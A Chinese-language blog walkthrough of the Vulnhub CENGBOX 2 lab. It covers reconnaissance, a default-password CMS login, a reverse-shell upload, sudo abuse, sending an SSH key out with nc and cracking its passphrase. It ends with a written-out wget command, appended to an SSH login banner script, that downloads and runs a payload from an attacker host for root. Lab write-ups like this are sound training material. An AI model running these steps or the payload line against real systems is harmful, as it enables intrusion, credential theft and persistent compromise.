首页 > 技术文章 > Vulnhub实战靶场:CENGBOX: 2

sym945 2021-01-18 13:23 原文

一、环境搭建

1、官网下载连接:https://www.vulnhub.com/entry/cengbox-1,475/

2、下载之后,使用Oracle VM VirtualBox导入靶场环境

3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

 二、靶场攻略

1、nmap -sP --min-hostgroup 1024 --min-parallelism 1024  10.10.114.0/24,获得靶场真实ip

收集启动的服务信息,发现开启了21、80、22,FTP服务未进行认证有个note.txt文件

 登录FTP服务,下载查看文件

得到提示,网站用的默认密码,有两个人名Kevin,Aaron可能是账户名,还有要转向的域名

 

 2、修改HOTS访问80端口网站,收集信息,直接访问域名网站,没任何提示

使用gobuster vhost -u ceng-company.vm -w /usr/share/wordlists/dirb/big.txt,对子域名进行爆破,发现一个403的界面

访问直接,提示没网站

再次编辑hots文件,访问403提示了

 

 对网站目录进行爆破:gobuster dir -u admin.ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,得到一个gila跳转301目录

 

 终于访问到网站,知道是Gila cms搭建的 

 3、直接在目录后加上admin,跳转到后台登录界面

 账号密码,需要根据FTP下载的文件提示,提示只改了Kevin的设置,登录用户名提示用的email格式的,所以平凑尝试用kevin@ceng-company.vm,密码admin,登陆成功

 4、进入文件管理界面,发现/tmp目录中,httaccess禁止了php执行,直接删除之后,上传msf生成的反射shell的文件,成功上传getshell

 5、接下来就是提权了,sudo -l,发现不需要密码就可以执行的脚本

 查看脚本

使用sudo -u执行脚本之后,运行python交互shell的命令,得到交互shell,查看账户已经为swartz账户

 

 6、切换到另一个账户,发现user.txt,这是这个系列靶场的低权限账户的flag文件,不过现在无法权限,查看目录发现.ssh隐藏目录

 进入.ssh目录,发现ssh密钥文件

 使用nc将密钥发送到kali中

 kali里监听端口,成功得到密钥信息

 kali里,新建id_rsa文件,将得到的私钥信息保存,之后使用ssh2john.py将保存的私钥信息,转化成可使用john破解的信息,之后使用john进行破解,得到私钥密码legend

 使用ssh利用得到的密钥,登录账户,将密钥文件权限改为600否则无法使用,输入密码成功登录

 得到user.txt里的flag

 7、该提权到root了,find / -type f -perm -g+rwx 2>/dev/null,寻找可利用的文件,查找到这几个文件,查找之后知道是ssh登录时的欢迎信息

首先,在msf中,使用web_delivery,设置好一个web脚本传递,使用msf生成的脚本传递命令

 在ssh登录到mitnick账户之后,执行生成的命令,然后退出ssh

在msf中已经得到这个账户权限的shell,然后在msf这个shell中,执行命令echo "wget -qO cHiawSTV --no-check-certificate http://10.10.114.191:8080/xhSTya2IiJuj3fJ; chmod +x cHiawSTV; ./cHiawSTV& disown" >> /etc/update-motd.d/00-header,将刚才执行的web传递命令,写入到00-header的ssh连接提示文件中

 

 再次使用ssh登录,在msf中,顺利得到root权限的shell,拿到flag

 

 完

推荐阅读